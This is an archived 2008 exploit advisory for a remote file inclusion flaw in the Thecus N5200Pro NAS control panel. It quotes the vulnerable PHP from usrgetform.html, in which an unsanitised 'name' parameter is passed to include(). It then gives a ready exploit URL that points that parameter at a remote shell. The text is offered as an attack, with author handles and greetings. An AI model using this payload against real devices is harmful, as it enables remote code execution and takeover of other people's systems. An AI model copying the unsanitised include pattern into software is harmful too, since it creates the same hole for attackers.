thecus-rfi.txt
Posted on 20 February 2008
Thecus N5200Pro NAS Server Control Panel Remote File İnclude Author : Crackers_Child Mail : cashr00t@hotmail.com Bug in : usrgetform.html <?php $htm=$_REQUEST['name']; require_once("/img/htdocs/webconfig"); require_once("/img/www/inc/function.php"); get_sysconf(); $version=trim(shell_exec("/bin/cat /img/version")); $model=trim(shell_exec('/bin/cat /proc/thecus_io | awk -F: '/CPUFLAG/{printf("%s", $2)}'')); if($model=="1"){ $model_name=$webconfig['product_no'].$webconfig['pro']; }else{ $model_name=$webconfig['product_no']; } if (!$htm){ print 'no name given'; exit; } if ($htm=='lang') $htm='../pub/lang'; session_start(); header('Content-type: text/html;charset=utf-8'); $lang='en'; if (isset($_SESSION['lang'])){$lang=$_SESSION['lang'];}; ob_start(); include("$htm.htm"); $html=ob_get_contents(); ob_end_clean(); include_once('header.html'); ?> Exploit : www.site.com:9443/usr/usrgetform.html?name=Shelz? İnfo : http://www.thecus.com/products_over.php?cid=11&pid=8 Greetz: Str0ke
